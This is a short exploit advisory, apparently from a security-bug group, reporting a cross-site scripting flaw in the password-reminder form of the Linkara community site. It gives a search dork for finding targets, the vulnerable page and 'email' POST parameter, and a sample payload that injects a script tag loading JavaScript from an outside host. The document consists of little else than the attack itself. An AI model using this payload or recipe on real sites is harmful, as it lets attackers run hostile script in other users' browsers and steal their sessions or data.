+==========================================================================+
+          Copyright 2004/2008 - Linkara   & XSS Remote evil cOD3          +
+==========================================================================+


Author(s): Ivan Sanchez 

Product: © Copyright 2004/2008 - Linkara, S.L. 

Web:http://www.linkara.com/

Versions: 2004/2008 - Linkara

Date: 25/06/2008


"Linkara.com is a free comunity in Internet.... "




GOOGLE DORKS:
------------

"Copyright 2004/2008 - Linkara"





Exploit:
-------

¿Has olvidado tu contraseña?


http://www.linkara.com/recordar.html


In the Texbox insert evil remote code.

tHEN (wait seconds...)


Parameter POST=email (insert there evil , remote XSS)


Example:  "><script src=http://site/scripts/evil.js></script> 




NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+      Copyright 2004/2008 - Linkara   & XSS Remote evil cOD3              +
+==========================================================================+